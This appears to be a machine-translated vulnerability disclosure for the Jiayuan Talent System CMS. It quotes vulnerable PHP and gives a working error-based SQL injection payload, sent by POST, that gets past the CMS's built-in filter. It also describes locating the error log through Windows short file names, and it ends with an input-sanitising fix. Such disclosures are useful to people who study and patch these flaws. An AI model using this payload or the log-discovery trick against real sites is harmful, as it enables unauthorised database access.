Jiayuan Talent System Latest Version injection (ignoring defense)
See \ member \ person_interview.php
If ($ do = 'del ') {$ checks = $ _ POST ['check']; $ db-> query ("delete from {$ cfg ['tb _ pre']} myinterview where I _pmember = '$ username' and I _id in ($ checks )"); showmsg ('deleted successfully! ',"? M = person_interview & show = $ show ", 0,2000); exit ();
As can be seen from the code above, $ checks directly enters the SQL statement without single quotation marks.
However, this cms has a built-in 80 sec filtering script. Of course, there are detailed methods to bypass it on the Internet.
http://127.0.0.1/frcms/member/index.php?m=person_interview&do=del
Then, submit the data in POST.
checks=1) and char(@`'`) or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) %23`'`
However, there is no echo directly, because it will write the SQL error information into a log.
The following code shows the name of the log file.
function log_write($message, $type = 'php') {global $cfg, $fr_time, $username;$userip = getip(); $fr_time or $fr_time = time();$user = $username ? $username : 'guest'; dir_create(DATA_ROOT.'/log/'); $log_file = DATA_ROOT.'/log/'.$type.'_'.md5($cfg['cookie_encode']).'.txt';$log = date('Y-m-d H:i:s', $fr_time)."||$userip||$user||".$_SERVER['SCRIPT_NAME']."||".str_replace('&', '&', $_SERVER['QUERY_STRING'])."||$message\r\n"; $olog=file_get_contents($log_file); fputs(fopen($log_file,"w"), $log.$olog);}
By using md5 $ cfg ['cookie _ encode'], it seems that it cannot be accessed. However, in Windows, you can use short file names.
We only need the first six digits of the file name. In addition, the first four digits of the log are fixed as SQL _, and the last two digits will run in seconds.
Solution:
$checks = preg_replace("/[^0-9,\.-]/i",'',$checks);